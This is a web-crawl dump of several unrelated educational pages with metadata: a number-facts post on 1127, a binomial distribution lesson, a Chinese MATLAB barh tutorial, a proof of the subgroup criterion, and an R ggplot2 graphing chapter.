https://findthefactors.com/2018/07/12/1127-and-level-5/
[ "# 1127 and Level 5\n\nIf the clues in this puzzle were in a Find the Factors 1 – 12, puzzle, the needed factors might be completely different than the ones in this puzzle’s solution. Fortunately, we can only use factors from 1 to 10, so this puzzle will make you think, but shouldn’t be so difficult.", null, "Print the puzzles or type the solution in this excel file: 10-factors-1121-1133\n\nHere are a few facts about the number 1127:\n\n• 1127 is a composite number.\n• Prime factorization: 1127 = 7 × 7 × 23, which can be written 1127 = 7² × 23\n• The exponents in the prime factorization are 2 and 1. Adding one to each and multiplying we get (2 + 1)(1 + 1) = 3 × 2  = 6. Therefore 1127 has exactly 6 factors.\n• Factors of 1127: 1, 7, 23, 49, 161, 1127\n• Factor pairs: 1127 = 1 × 1127, 7 × 161, or 23 × 49\n• Taking the factor pair with the largest square number factor, we get √1127 = (√49)(√23) = 7√23 ≈ 33.57082", null, "1127 is palindrome 5115 in BASE 6 because 5(6³) + 1(6²) + 1(6) + 5(1) = 1127\n\nThis site uses Akismet to reduce spam. Learn how your comment data is processed." ]
[ null, "https://i0.wp.com/findthefactors.com/wp-content/uploads/2018/07/1127-Puzzle.jpg", null, "https://i0.wp.com/findthefactors.com/wp-content/uploads/2018/07/1127-Factor-Pairs.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8789578,"math_prob":0.9952212,"size":955,"snap":"2022-40-2023-06","text_gpt3_token_len":333,"char_repetition_ratio":0.1409043,"word_repetition_ratio":0.0,"special_character_ratio":0.42198953,"punctuation_ratio":0.12560387,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9974543,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,6,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-02-03T06:19:41Z\",\"WARC-Record-ID\":\"<urn:uuid:f413abda-1f4e-472a-830a-04cdaf2f78a0>\",\"Content-Length\":\"61674\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7a43e9ef-f1c2-4cbb-b9a3-39cc0061dc2b>\",\"WARC-Concurrent-To\":\"<urn:uuid:7cbf28f9-fcca-4dbb-8d3e-06225f3a6e24>\",\"WARC-IP-Address\":\"192.0.78.222\",\"WARC-Target-URI\":\"https://findthefactors.com/2018/07/12/1127-and-level-5/\",\"WARC-Payload-Digest\":\"sha1:PPPV3NINHNU2KORN2SWGEG2TBM673ZLY\",\"WARC-Block-Digest\":\"sha1:OHHGE5GK4IARX3E3SLDHGYBJW5ZBUXU5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764500044.16_warc_CC-MAIN-20230203055519-20230203085519-00113.warc.gz\"}"}
https://www.studypug.com/ca/statistics/binomial-distribution
[ "# Binomial distribution\n\n### Binomial distribution\n\n#### Lessons\n\n$P(x)={_n}C_x \\;P^x(1-p)^{n-x}$\n\n$n$: number of trials\n$x$: number of success in n trials\n$p$: probability of success in each trial\n$P(x)$: probability of getting $x$ successes (out of $n$ trials)\n\n$\\cdot$ binomialpdf $(n,p,x)$\n$\\cdot$ binomialcdf $(n,p,x)$\n• Introduction\na)\nBinomial\n\nb)\nBinomial Formula\n\nc)\nBinomialpdf Calculator\n\n• 1.\nIdentify which of the following experiments below are binomial distributions?\n\ni. A fair die is rolled 4 times. What is the probability of the one coming up 2 times?\n\nii. A fair coin is flipped until head comes up 7 times. What is the probability that the coin will be flipped 10 times?\n\niii. 1,000,000 nails are produced in a factory a day. If each nail has a probability of 0.5% of being defective (something being wrong with that nail), then what is the probability that less than 50 nails will be defective in a day?\n\niv. Roughly 7.5% of Canadians have some form of heart disease. If 100 Canadians are sampled what is the probability that 10 of them will have heart disease?\n\nv. If 5 cards are drawn from a deck, what is the probability that 2 of them will be hearts?\n\nvi. If a fair die is rolled 8 times, what is the probability of getting 2 fours and 3 sixes?\n\n• 2.\nA die is rolled 3 times, what is the probability that a four is rolled exactly 2 times?\n\n• 3.\nA coin is flipped 20 times, what is the probability that the coin comes up heads 15 times?\n\n• 4.\nJimmy the Joker is an unfair gambler. He weights a die so it rolls a \"6\" with 75% chance. He then bets that if he rolls his die 4 times he will roll six exactly 3 times. What is his probability of winning this bet?\n\n• 5.\nThomas is packing for a trip and wants to bring some stuffed animals along for comfort. He owns 8 stuffed animals, and will pack each stuffed animals independently of all the others with a probability of 30%. Determine the probability that he takes;\na)\n0 stuffed animals along with him.\n\nb)\n1 stuffed animal with him\n\nc)\nat most two animals along with him.\n\nd)\nat most 5 animals along with him.\n\ne)\nat least 6 animals along with him." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.94694513,"math_prob":0.99126416,"size":2035,"snap":"2019-43-2019-47","text_gpt3_token_len":500,"char_repetition_ratio":0.17823732,"word_repetition_ratio":0.038997214,"special_character_ratio":0.23980343,"punctuation_ratio":0.12,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9982786,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-21T04:02:51Z\",\"WARC-Record-ID\":\"<urn:uuid:3c8045c0-9bff-4371-98f9-993aa4c6b069>\",\"Content-Length\":\"198884\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:627d24e8-f7e6-4fd7-a1b9-dd6c67ed5d11>\",\"WARC-Concurrent-To\":\"<urn:uuid:d4496f0a-fcaa-4e34-af42-6c9cc531ac48>\",\"WARC-IP-Address\":\"34.200.169.6\",\"WARC-Target-URI\":\"https://www.studypug.com/ca/statistics/binomial-distribution\",\"WARC-Payload-Digest\":\"sha1:AOTHD4ZTIQLMWKJHQWZASOGUDQQ64CIB\",\"WARC-Block-Digest\":\"sha1:LXJGDT5VLJHLBY5HJFEWYHCUS6G2ZY7W\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496670729.90_warc_CC-MAIN-20191121023525-20191121051525-00139.warc.gz\"}"}
https://iymark.com/program/matlab-scatter-function-barh.html
[ "# Matlab水平条形图创建函数barh教程\n\n4\n(4)\n\n```>> help barh\nbarh Horizontal bar graph.\nbarh(X,Y) draws the columns of the M-by-N matrix Y as M groups of\nN horizontal bars. The vector X must not have duplicate values.\n\nbarh(Y) uses the default value of X=1:M. For vector inputs,\nbarh(X,Y) or barh(Y) draws LENGTH(Y) bars. The colors are set by\nthe colormap.\n\nbarh(X,Y,WIDTH) or barh(Y,WIDTH) specifies the width of the\nbars. Values of WIDTH > 1, produce overlapped bars. The\ndefault value is WIDTH=0.8.\n\nbarh(...,'grouped') produces the default horizontal grouped bar chart.\nbarh(...,'stacked') produces a horizontal stacked bar chart.\nbarh(...,LINESPEC) uses the line color specified (one of 'rgbymckw').\n\nbarh(AX,...) plots into AX instead of GCA.\n\nH = barh(...) returns a vector of handles to barseries objects.\n\nUse SHADING FACETED to put edges on the bars. Use SHADING FLAT to\nturn them off.\n\nExamples: subplot(3,1,1), barh(rand(10,5),'stacked'), colormap(cool)\nsubplot(3,1,2), barh(0:.25:1,rand(5),1)\nsubplot(3,1,3), barh(rand(2,3),.75,'grouped')```\n\n## 常见用法\n\n```barh(y)\nbarh(x,y)\nbarh(___,width)\nbarh(___,style)\nbarh(___,color)\nbarh(___,Name,Value)\nbarh(ax,___)\nb = barh(___)```\n\n## 语法说明\n\nbarh(y) 创建一个水平条形图,每个条形对应 y 中一个元素。如果 y 是 m×n 矩阵,则 barh 创建每组包含 n 个条形的 m 个组。\n\nbarh(x,y) 沿垂直轴在 x 指定的位置绘制条形。\n\nbarh(___,width) 指定每个条形占用的可用空间比例。例如,barh(y,1) 让每组中的条形紧挨在一起。将 width 指定为上述任一语法中的最后一个参数。\n\nbarh(___,style) 指定条形组的样式。例如,barh(y,’stacked’) 将每组中的条形堆叠成一个多色条形。\n\nbarh(___,color) 为所有条形指定单一颜色。例如,barh(y,’red’) 显示红色条形。\n\nbarh(___,Name,Value) 使用一个或多个名称-值对组参数指定条形图的属性。仅使用默认 ‘grouped’ 或 ‘stacked’ 样式的条形图支持设置条形属性。在所有其他输入参数之后指定名称-值对组参数。\n\nbarh(ax,___) 在目标坐标区中显示条形图。将坐标区指定为上述任一语法中的第一个参数。\n\nb = barh(___) 返回一个或多个 Bar 对象。如果 y 是向量,则 barh 返回一个 Bar 对象。如果 y 是矩阵,则 barh 为每个序列返回一个 Bar 对象。显示条形图后,使用 b 设置条形的属性。\n\n## 显示一个条形序列\n\n```y = [10 20 30 41];\nbarh(y)```\n\n## 显示具有轴标签和图例的四个条形序列\n\n```x = [1980 1990 2000];\ny = [40 50 63 52; 42 55 50 48; 30 20 44 40];\nbarh(x,y)\nxlabel('Snowfall')\nylabel('Year')\nlegend({'Springfield','Fairview','Bristol','Jamesville'})```\n\n## 更改基准值\n\n```y = [8 15 33; 30 35 40; 50 55 62];\nbarh(y,'BaseValue',25)```\n\n## 显示具有负数据的堆叠条形\n\n```x = [1980 1990 2000];\ny = [15 20 -5; 10 -17 21; -10 5 15];\nbarh(x,y,'stacked')```\n\n## 自定义垂直轴刻度标签\n\n```y = [10 20 30 41];\nbarh(y)\nyticklabels({'April','May','June','July'})```\n\nMatlab2016中不支持yticklabels函数,其官方运行结果如下:\n\n## 指定分类数据\n\n```X = categorical({'Small','Medium','Large','Extra Large'});\nX = reordercats(X,{'Small','Medium','Large','Extra Large'});\nY = [10 21 33 52];\nbarh(X,Y)```\n\nMatlab2016中,不支持reordercats函数,其官方运行结果如下:\n\n## 在条形末端添加标签\n\n```x = [1 2 3];\nvals = [2 3 6; 11 23 26];\nb = barh(x,vals);```\n\n```xtips1 = b(1).YEndPoints + 0.3;\nytips1 = b(1).XEndPoints;\nlabels1 = string(b(1).YData);\ntext(xtips1,ytips1,labels1,'VerticalAlignment','middle')```\n\n```xtips2 = b(2).YEndPoints + 0.3;\nytips2 = b(2).XEndPoints;\nlabels2 = string(b(2).YData);\ntext(xtips2,ytips2,labels2,'VerticalAlignment','middle')```\n\n## 指定条形宽度和颜色\n\n```y = [10 22 30 42];\nwidth = 0.4;\nbarh(y,width,'red');```\n\n## 自定义一个条形序列\n\n```y = [10 15 20; 30 35 40; 50 55 62];\nb = barh(y);```\n\n```b(2).FaceColor = [.2 .6 .5];\nb(2).EdgeColor = [.63 .08 .18];\nb(2).LineWidth = 2;```\n\n## 比较不同的条形样式\n\n```x = [1980 1990 2000];\ny = [8 15 25; 30 35 40; 50 55 62];\n\n% Grouped\ntiledlayout(2,1);\nax1 = nexttile;\nbarh(ax1,x,y)\ntitle('Grouped Style')\n\n% Stacked\nax2 = nexttile;\nbarh(ax2,x,y,'stacked')\ntitle('Stacked 
Style')```\n\nMatlab2016中,不支持tiledlayout以及nexttile函数,因此我们用subplot函数来分区域显示图形,代码如下:\n\n```x = [1980 1990 2000];\ny = [8 15 25; 30 35 40; 50 55 62];\n\n% Grouped\nsubplot(2,1,1)\nbarh(x,y)\ntitle('Grouped Style')\n\n% Stacked\nsubplot(2,1,2)\nbarh(x,y,'stacked')\ntitle('Stacked Style')```", null, "" ]
[ null, "https://oss.iymark.com/2021/03/apkdownload.png", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.6336454,"math_prob":0.99465156,"size":4789,"snap":"2021-31-2021-39","text_gpt3_token_len":2685,"char_repetition_ratio":0.105329156,"word_repetition_ratio":0.08301887,"special_character_ratio":0.32825226,"punctuation_ratio":0.20247933,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9784937,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-26T09:52:03Z\",\"WARC-Record-ID\":\"<urn:uuid:59922160-1c56-4724-8ada-a31b6d7e2b1b>\",\"Content-Length\":\"87344\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7e51f600-dc06-4fee-b891-73e5591c9703>\",\"WARC-Concurrent-To\":\"<urn:uuid:4b4f9f8b-b005-4a84-b83c-23b9d2be31a7>\",\"WARC-IP-Address\":\"47.115.48.89\",\"WARC-Target-URI\":\"https://iymark.com/program/matlab-scatter-function-barh.html\",\"WARC-Payload-Digest\":\"sha1:IX74OAJZ5KJZMXSFQQKQSYDOONEMPH6Q\",\"WARC-Block-Digest\":\"sha1:IX2CXIMB7XIA2YFZTBLERFMCGX3IBJFJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057857.27_warc_CC-MAIN-20210926083818-20210926113818-00148.warc.gz\"}"}
https://groupprops.subwiki.org/wiki/Sufficiency_of_subgroup_criterion
[ "# Sufficiency of subgroup criterion\n\n## Contents\n\nThis article gives the statement, and possibly proof, of a basic fact in group theory.\nView a complete list of basic facts in group theory\nVIEW FACTS USING THIS: directly | directly or indirectly, upto two steps | directly or indirectly, upto three steps|\nThis article gives a proof/explanation of the equivalence of multiple definitions for the term subgroup\nView a complete list of pages giving proofs of equivalence of definitions\n\n## Statement\n\nFor a subset", null, "$H$ of a group", null, "$G$, the following are equivalent:\n\n1.", null, "$H$ is a subgroup, viz", null, "$H$ is closed under the binary operation of multiplication, the inverse map, and contains the identity element\n2.", null, "$H$ is a nonempty set closed under left quotient of elements (that is, for any", null, "$a, b$ in", null, "$H$,", null, "$b^{-1}a$ is also in", null, "$H$)\n3.", null, "$H$ is a nonempty set closed under right quotient of elements (that is, for any", null, "$a, b$ in", null, "$H$,", null, "$ab^{-1}$ is also in", null, "$H$)\n\n## Proof\n\nWe shall here prove the equivalence of the first two conditions. Equivalence of the first and third conditions follows by analogous reasoning.\n\n### (1) implies (2)\n\nClearly, if", null, "$H$ is a subgroup:\n\n•", null, "$H$ is nonempty since", null, "$H$ contains the identity element\n• Whenever", null, "$a, b$ are in", null, "$H$ so is", null, "$b^{-1}$ and hence", null, "$b^{-1}a$\n\n### (2) implies (1)\n\nSuppose", null, "$H$ is a nonempty subset closed under left quotient of elements. Then, pick an element", null, "$u$ from", null, "$H$. (VIDEO WARNING: In the embeddded video, the letter", null, "$a$ is used in place of", null, "$u$, which is a little unwise, but the spirit of reasoning is the same).\n\n•", null, "$e$ is in", null, "$H$: Set", null, "$a = b = u$ to get", null, "$u^{-1}u$ is contained in", null, "$H$, hence", null, "$e$ is in", null, "$H$\n•", null, "$g \\in H \\implies g^{-1} \\in H$: Now that", null, "$e$ is in", null, "$H$, set", null, "$b = g, a =e$ to get", null, "$b^{-1}a = g^{-1}e$ is also in", null, "$H$, so", null, "$g^{-1}$ is in", null, "$H$\n•", null, "$x,y \\in H \\implies xy \\in H$: Set", null, "$a = y, b= x^{-1}$. The previous step tells us both are in", null, "$H$. So", null, "$b^{-1}a = (x^{-1})^{-1}y$ is in", null, "$H$, which tells us that", null, "$xy$ is in", null, "$H$.\n\nThus,", null, "$H$ satisfies all the three conditions to be a subgroup." ]
[ null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/d/f/c/dfcf28d0734569a6a693bc8194de62bf.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/b/3/4/b345e1dc09f20fdefdea469f09167892.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/d/1/4/d1401b88dc1ca9a0cc3c986da90aa1d9.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/b/3/4/b345e1dc09f20fdefdea469f09167892.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/3/0/9/309e5e7416605b7f3302f981e9d2b36c.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/b/3/4/b345e1dc09f20fdefdea469f09167892.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/8/3/a/83a2628e12eb8f3c30e16c050313498a.png ", null, "https://groupprops.subwiki.org/w/images/math/d/1/4/d1401b88dc1ca9a0cc3c986da90aa1d9.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/7/b/7/7b774effe4a349c6dd82ad4f4f21d34c.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/0/c/c/0cc175b9c0f1b6a831c399e269772661.png ", null, "https://groupprops.subwiki.org/w/images/math/7/b/7/7b774effe4a349c6dd82ad4f4f21d34c.png ", null, "https://groupprops.subwiki.org/w/images/math/e/1/6/e1671797c52e15f763380b45e841ec32.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/e/8/3/e83b72c4972714b33c6a84d4a4b6f380.png ", null, "https://groupprops.subwiki.org/w/images/math/c/4/1/c41fffd315e150055345c070c99d5792.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/e/1/6/e1671797c52e15f763380b45e841ec32.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/a/e/d/aed0af44ab9ce990ef6a64984d7e4951.png ", null, "https://groupprops.subwiki.org/w/images/math/e/1/6/e1671797c52e15f763380b45e841ec32.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, 
"https://groupprops.subwiki.org/w/images/math/f/0/0/f000f461fabde763b206964d228a6cea.png ", null, "https://groupprops.subwiki.org/w/images/math/7/c/a/7ca808559a2be907b011a93cb953499e.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/f/b/3/fb339a23074abf4e00615903229a3555.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/f/8/9/f897519ab9401e8ef3808c325a495eb9.png ", null, "https://groupprops.subwiki.org/w/images/math/2/a/4/2a4047d17c3efc6d0b8e44df89413bbe.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/7/c/a/7ca40c668bfdb75837a095a68a43e250.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/3/e/4/3e44107170a520582ade522fa73c1d15.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null, "https://groupprops.subwiki.org/w/images/math/c/1/d/c1d9f50f86825a1a2302ec2449c17196.png ", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.91200703,"math_prob":0.99982065,"size":1686,"snap":"2020-24-2020-29","text_gpt3_token_len":383,"char_repetition_ratio":0.11117717,"word_repetition_ratio":0.10897436,"special_character_ratio":0.22835113,"punctuation_ratio":0.121212125,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999912,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-09T10:48:24Z\",\"WARC-Record-ID\":\"<urn:uuid:b7c7d72a-8331-429d-af1e-f4c8c97e8c5e>\",\"Content-Length\":\"33628\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a43922cb-e94c-440c-a695-9817cef16651>\",\"WARC-Concurrent-To\":\"<urn:uuid:17cb833d-7117-4df7-8b14-9e41befa0dfa>\",\"WARC-IP-Address\":\"96.126.114.7\",\"WARC-Target-URI\":\"https://groupprops.subwiki.org/wiki/Sufficiency_of_subgroup_criterion\",\"WARC-Payload-Digest\":\"sha1:LYEJQHE2ARV35HNKWQ52BFNBRKAN6C2S\",\"WARC-Block-Digest\":\"sha1:BJO2RZAULUHSHL4THAF5XFOMXFFJE4ZH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593655899931.31_warc_CC-MAIN-20200709100539-20200709130539-00101.warc.gz\"}"}
https://crimebythenumbers.com/graphing-intro.html
[ "# 14 Graphing with `ggplot2`\n\nFor this chapter you’ll need the following file, which is available for download here: apparent_per_capita_alcohol_consumption.rda.\n\nWe’ve made some simple graphs earlier; in this lesson we will use the package `ggplot2` to make simple and elegant-looking graphs.\n\nThe “gg” part of `ggplot2` stands for “grammar of graphics”, which is the idea that most graphs can be made using the same few “pieces.” We’ll get into those pieces during this lesson. For a useful cheat sheet for this package see here.\n\n``install.packages(\"ggplot2\")``\n``library(ggplot2)``\n\nWhen working with new data, it’s often useful to quickly graph the data to try to understand what you’re working with. It is also useful when understanding how much to trust the data.\n\nThe data we will work on is data about alcohol consumption in US states from 1977-2017 from the National Institutes of Health. It contains the per capita alcohol consumption for each state for every year. Their method to determine per capita consumption is amount of alcohol sold / number of people aged 14+ living in the state. More details on the data are available here.\n\nNow we need to load the data.\n\n``load(\"data/apparent_per_capita_alcohol_consumption.rda\")``\n\nThe name of the data is quite long so for convenience let’s copy it to a new object with a better name, alcohol.\n\n``alcohol <- apparent_per_capita_alcohol_consumption``\n\nThe original data has every state, region, and the US as a whole. For this lesson we’re using data subsetted to just include states. For now let’s just look at Pennsylvania.\n\n``penn_alcohol <- alcohol[alcohol\\$state == \"pennsylvania\", ]``\n\n## 14.1 What does the data look like?\n\nBefore graphing, it’s helpful to see what the data includes. An important thing to check is what variables are available and what the units are for these variables.\n\n``````head(penn_alcohol)\n# state year ethanol_beer_gallons_per_capita ethanol_wine_gallons_per_capita\n# 1559 pennsylvania 2017 1.29 0.33\n# 1560 pennsylvania 2016 1.31 0.33\n# 1561 pennsylvania 2015 1.31 0.32\n# 1562 pennsylvania 2014 1.32 0.32\n# 1563 pennsylvania 2013 1.34 0.31\n# 1564 pennsylvania 2012 1.36 0.31\n# ethanol_spirit_gallons_per_capita ethanol_all_drinks_gallons_per_capita number_of_beers\n# 1559 0.71 2.34 305.7778\n# 1560 0.72 2.36 310.5185\n# 1561 0.70 2.33 310.5185\n# 1562 0.70 2.34 312.8889\n# 1563 0.68 2.33 317.6296\n# 1564 0.67 2.34 322.3704\n# number_of_glasses_wine number_of_shots_liquor number_of_drinks_total\n# 1559 65.48837 147.4128 499.2000\n# 1560 65.48837 149.4891 503.4667\n# 1561 63.50388 145.3366 497.0667\n# 1562 63.50388 145.3366 499.2000\n# 1563 61.51938 141.1841 497.0667\n# 1564 61.51938 139.1079 499.2000``````\n\nSo each row of the data is a single year of data for Pennsylvania. It includes alcohol consumption for wine, liquor, beer, and total drinks - both as gallons of ethanol (a hard unit to interpret) and more traditional measures such as glasses of wine or number of beers. The original data only included the gallons of ethanol data, which I converted to the more understandable units. If you encounter data with odd units, it is a good idea to convert it to something easier to understand - especially if you intend to show someone else the data or results.\n\n## 14.2 Graphing data\n\nTo make a plot using `ggplot()` (please note that the function does not have a 2 at the end of it, only the package name does), all you need to do is specify the data set and the variables you want to plot. 
From there you add on pieces of the graph using the `+` symbol (which operates like a `dplyr` pipe) and then specify what you want added.\n\nFor `ggplot()` we need to specify four things:\n\n1. The data set\n2. The x-axis variable\n3. The y-axis variable\n4. The type of graph - e.g. line, point, etc.\n\nSome useful types of graphs are:\n\n• `geom_point()` - A point graph, can be used for scatter plots\n• `geom_line()` - A line graph\n• `geom_bar()` - A barplot\n• `geom_smooth()` - Adds a regression line to the graph\n\n## 14.3 Time-series plots\n\nLet’s start with a time-series of beer consumption in Pennsylvania. In time-series plots the x-axis is always the time variable while the y-axis is the variable whose trend over time is what we’re interested in. When you see a graph showing, for example, crime rates over time, this is the type of graph you’re looking at.\n\nThe code below starts by writing our data set name. Then it says what our x- and y-axis variables are called. The x- and y-axis variables are within parentheses of the function called `aes()`. `aes()` stands for aesthetic, and what’s included inside here describes how the graph will look. It’s not intuitive to remember, but you need to include it. Like in `dplyr` functions, you do not need to put the column names in quotes or repeat which data set you are using.\n\n``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_beers\n))``````", null, "Note that on the x-axis it prints out every single year and makes it completely unreadable. That is because the “year” column is a character type, so R thinks each year is its own category. It prints every single year because it thinks we want every category shown. To fix this, we can make the column numeric, and `ggplot()` will be smarter about printing fewer years.\n\n``penn_alcohol\\$year <- as.numeric(penn_alcohol\\$year)``\n``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_beers\n))``````", null, "When we run it, we get our graph. It includes the variable names for each axis and shows the range of data through the tick marks. What is missing is the actual data. For that we need to specify what type of graph it is. We literally add it with the `+` followed by the type of graph we want. Make sure that the `+` is at the end of a line, not the start of one. Starting a line with the `+` will not work.\n\n``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_beers\n)) +\ngeom_point()``````", null, "``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_beers\n)) +\ngeom_line()``````", null, "We can also combine different types of graphs.\n\n``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_beers\n)) +\ngeom_point() +\ngeom_line()``````", null, "It looks like there’s a huge change in beer consumption over time. But look at where the y-axis starts. It starts around 280, so really that change is only ~60 beers. That’s because when graphs don’t start at 0, it can make small changes appear big. We can fix this by forcing the y-axis to begin at 0. We can add `expand_limits(y = 0)` to the graph to say that the value 0 must always appear on the y-axis, even if no data is close to that value.\n\n``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_beers\n)) +\ngeom_point() +\ngeom_line() +\nexpand_limits(y = 0)``````", null, "Now that graph shows what looks like nearly no change, even though that is also not true. Which graph is best? It’s hard to say.\n\nInside the types of graphs we can change how it is displayed. 
As with using `plot()`, we can specify the color and size of our lines or points.\n\n``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_beers\n)) +\ngeom_line(color = \"forestgreen\", size = 1.3)``````", null, "Some other useful features are changing the axis labels and the graph title. Unlike in `plot()`, we do not include these inside the parentheses of `ggplot()`; instead, each has its own function for adding it to the graph. The input to each of these functions is a string for what we want it to say.\n\n• `xlab()` - x-axis label\n• `ylab()` - y-axis label\n• `ggtitle()` - graph title\n``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_beers\n)) +\ngeom_line(color = \"forestgreen\", size = 1.3) +\nxlab(\"Year\") +\nylab(\"Number of Beers\") +\nggtitle(\"PA Annual Beer Consumption Per Capita (1977-2017)\")``````", null, "Many time-series plots show multiple variables over the same time period (e.g. murder and robbery over time). There are ways to change the data itself to make creating graphs like this easier, but let’s stick with the data we currently have and just change `ggplot()`.\n\n``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_glasses_wine\n)) +\ngeom_line()``````", null, "Then include a second `geom_line()` with its own `aes()` for the second variable. Since we are using the penn_alcohol data set for both lines, we do not need to include it in the second `geom_line()`, as it assumes that the data is the same if we don’t specify otherwise. If we used a different data set for the second line, we would need to specify which data set it is inside of `geom_line()` and before `aes()`.\n\n``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_glasses_wine\n)) +\ngeom_line() +\ngeom_line(aes(\nx = year,\ny = number_of_shots_liquor\n))``````", null, "A problem with this is that both lines are the same color. We need to set a color for each line and do 